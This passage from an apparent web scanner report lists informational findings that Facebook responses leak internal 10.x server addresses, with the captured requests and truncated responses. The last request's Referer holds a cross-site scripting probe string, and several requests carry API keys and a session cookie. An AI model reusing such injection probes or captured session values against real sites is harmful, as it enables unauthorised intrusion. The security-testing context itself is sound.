Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?api_key=158577044196953&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df251994bac%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=258&href=http%3A%2F%2Fwww.facebook.com%2Fnmemagazine&locale=en_GB&sdk=joey&show_faces=true&stream=false&width=356
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 02 May 2011 02:06:11 GMT
X-FB-Server: 10.30.145.198
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=30889345
Expires: Tue, 01 May 2012 02:23:44 GMT
Date: Mon, 09 May 2011 14:01:19 GMT
Connection: close
Content-Length: 103915

/*1304303048,169775558*/

if (window.CavalryLogger) { CavalryLogger.start_js(["Zz9gy"]); }

function object(b){var a=new Function();a.prototype=b;return new a();}function is_scalar(a){return (/string|
...[SNIP]...

20.6. http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Q0crEbz3ZUz.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yT/r/Q0crEbz3ZUz.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yT/r/Q0crEbz3ZUz.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=c87f9494a93b2590633af39d1b8e347f&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2fb777bd4%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent.parent%26transport%3Dpostmessage&href=www.indianasnewscenter.com%2Fnews%2Flocal%2FAt-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html&locale=en_US&numposts=25&sdk=joey&width=630
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 814
Content-Type: image/png
Last-Modified: Tue, 29 Mar 2011 05:23:09 GMT
X-FB-Server: 10.30.148.190
X-Cnection: close
Cache-Control: public, max-age=28605055
Expires: Wed, 04 Apr 2012 15:50:13 GMT
Date: Mon, 09 May 2011 13:59:18 GMT
Connection: close

.PNG
.
...IHDR................a...    pHYs...H...H.F.k>...    vpAg.........\.......bKGD.............WIDAT8O..;kTa.E.......3..tTL..._    .T.. .k..B..:.....vv".V."*
....P.....<2..7.{Z....W.O.`.....s....3......
...[SNIP]...

20.7. http://static.ak.fbcdn.net/rsrc.php/v1/yY/r/qWIGt6WPRA1.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yY/r/qWIGt6WPRA1.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yY/r/qWIGt6WPRA1.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=158577044196953&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df6000e528%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.nme.com%2Fnews%2Fsufjan-stevens%2F56527&locale=en_GB&numposts=10&sdk=joey&width=620
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 02 May 2011 23:39:20 GMT
X-FB-Server: 10.138.69.184
Vary: Accept-Encoding
Cache-Control: public, max-age=31020576
Expires: Wed, 02 May 2012 14:50:55 GMT
Date: Mon, 09 May 2011 14:01:19 GMT
Connection: close
Content-Length: 25519

/*1304434325,176833976*/

if (window.CavalryLogger) { CavalryLogger.start_js(["GBzRm"]); }

if(!window.CommentAdminPanelController){window.CommentAdminPanelController=function(a){copy_properties(this,
...[SNIP]...

20.8. http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/dMZead4v66-.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yd/r/dMZead4v66-.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yd/r/dMZead4v66-.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=158577044196953&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df6000e528%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.nme.com%2Fnews%2Fsufjan-stevens%2F56527&locale=en_GB&numposts=10&sdk=joey&width=620
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Tue, 03 May 2011 18:58:29 GMT
X-FB-Server: 10.138.64.185
Vary: Accept-Encoding
Cache-Control: public, max-age=31036912
Expires: Wed, 02 May 2012 19:23:11 GMT
Date: Mon, 09 May 2011 14:01:19 GMT
Connection: close
Content-Length: 135251

/*1304450636,176832697*/

if (window.CavalryLogger) { CavalryLogger.start_js(["5bAwC"]); }

function Poller(b,a){this.setTimePeriod(b);this._requestCallback=a;this.scheduleRequest();}Poller.MIN_TIME_P
...[SNIP]...

20.9. http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/RxZwFAf4oY9.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yj/r/RxZwFAf4oY9.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yj/r/RxZwFAf4oY9.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=158577044196953&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df6000e528%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.nme.com%2Fnews%2Fsufjan-stevens%2F56527&locale=en_GB&numposts=10&sdk=joey&width=620
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Tue, 29 Mar 2011 00:35:02 GMT
X-FB-Server: 10.138.64.185
Vary: Accept-Encoding
Cache-Control: public, max-age=27946669
Expires: Wed, 28 Mar 2012 00:59:08 GMT
Date: Mon, 09 May 2011 14:01:19 GMT
Connection: close
Content-Length: 7142

/*1301360209,176832697*/

if (window.CavalryLogger) { CavalryLogger.start_js(["8PKAL"]); }

OauthLogin=function(b,a){this.provider=b;this.endpoint=a;return this;};OauthLogin.prototype.login=function(d
...[SNIP]...

20.10. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VangFCcwoLx.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yo/r/VangFCcwoLx.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yo/r/VangFCcwoLx.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=c87f9494a93b2590633af39d1b8e347f&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2fb777bd4%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent.parent%26transport%3Dpostmessage&href=www.indianasnewscenter.com%2Fnews%2Flocal%2FAt-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html&locale=en_US&numposts=25&sdk=joey&width=630
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 417
Content-Type: image/png
Last-Modified: Mon, 08 Mar 2010 22:31:45 -0800
X-Powered-By: HPHP
X-FB-Server: 10.138.17.185
Cache-Control: public, max-age=26238780
Expires: Thu, 08 Mar 2012 06:32:18 GMT
Date: Mon, 09 May 2011 13:59:18 GMT
Connection: close

.PNG
.
...IHDR.............(-.S....PLTE.......................................................................................................................................MMM...@@@...............
...[SNIP]...

20.11. http://static.ak.fbcdn.net/rsrc.php/v1/zX/r/i_oIVTKMYsL.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zX/r/i_oIVTKMYsL.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zX/r/i_oIVTKMYsL.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 92
Content-Type: image/png
Last-Modified: Mon, 15 Mar 2010 08:00:35 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.69.184
Cache-Control: public, max-age=26787663
Expires: Wed, 14 Mar 2012 15:00:12 GMT
Date: Mon, 09 May 2011 13:59:09 GMT
Connection: close

.PNG
.
...IHDR..............o&....#IDAT.[c...v.....].....A..\.Y.,..@....\.-.    .....IEND.B`.

20.12. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=7da83be58ab0c1284412f725c119a00f&extern=0&channel=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story%3Ffbc_channel%3D1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.121.103
X-Cnection: close
Date: Mon, 09 May 2011 13:59:37 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

20.13. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=158577044196953&app_id=158577044196953&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3da0e71b4%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_GB&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13cbc9408%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5219f76%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df8d6f6978%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5219f76&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2ef9fcad%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5219f76&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df56c07c58%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5219f76&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2ef9fcad&origin=http%3A%2F%2Fwww.nme.com%2Ff272cfc8b4&relation=parent&transport=postmessage&frame=f5219f76
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.123.105
X-Cnection: close
Date: Mon, 09 May 2011 14:01:16 GMT
Content-Length: 0

20.14. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=9fb13b1113aed014ce53c005fe8c35a3&extern=0&channel=http%3A%2F%2Fwww.thevine.com.au%2Fmusic%2Fblogs%2Fmusic-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx%3Ffbc_channel%3D1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.105.117
X-Cnection: close
Date: Mon, 09 May 2011 14:01:09 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

20.15. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=c87f9494a93b2590633af39d1b8e347f&app_id=c87f9494a93b2590633af39d1b8e347f&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1882bbf1%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13f3d1bb8%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa9baf21c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df241ffe65%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa9baf21c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3301b469%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa9baf21c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df17fe0c2e8%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa9baf21c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3301b469&origin=http%3A%2F%2Fwww.indianasnewscenter.com%2Ff208516ccc&relation=parent&transport=postmessage&frame=fa9baf21c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.109.105
X-Cnection: close
Date: Mon, 09 May 2011 13:59:09 GMT
Content-Length: 0

20.16. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=MY%20APP%20ID&app_id=MY%20APP%20ID&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df16a1716f4%26origin%3Dhttp%253A%252F%252Fwww.floridatoday.com%252Ff6594b49c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df319039ca%26origin%3Dhttp%253A%252F%252Fwww.floridatoday.com%252Ff6594b49c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1358fe16c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1efb99044%26origin%3Dhttp%253A%252F%252Fwww.floridatoday.com%252Ff6594b49c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1358fe16c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df381179ac%26origin%3Dhttp%253A%252F%252Fwww.floridatoday.com%252Ff6594b49c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1358fe16c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df48d55258%26origin%3Dhttp%253A%252F%252Fwww.floridatoday.com%252Ff6594b49c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1358fe16c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.112.112
X-Cnection: close
Date: Mon, 09 May 2011 13:59:33 GMT
Content-Length: 22

Invalid Application ID

20.17. http://www.facebook.com/plugins/comments.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/comments.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/comments.php?api_key=158577044196953&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df6000e528%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.nme.com%2Fnews%2Fsufjan-stevens%2F56527&locale=en_GB&numposts=10&sdk=joey&width=620 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.124.129
X-Cnection: close
Date: Mon, 09 May 2011 14:01:17 GMT
Content-Length: 102275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.18. http://www.facebook.com/plugins/comments.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/comments.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/comments.php?api_key=c87f9494a93b2590633af39d1b8e347f&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2fb777bd4%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent.parent%26transport%3Dpostmessage&href=www.indianasnewscenter.com%2Fnews%2Flocal%2FAt-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html&locale=en_US&numposts=25&sdk=joey&width=630 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.120.114
X-Cnection: close
Date: Mon, 09 May 2011 13:59:16 GMT
Content-Length: 14072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.19. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
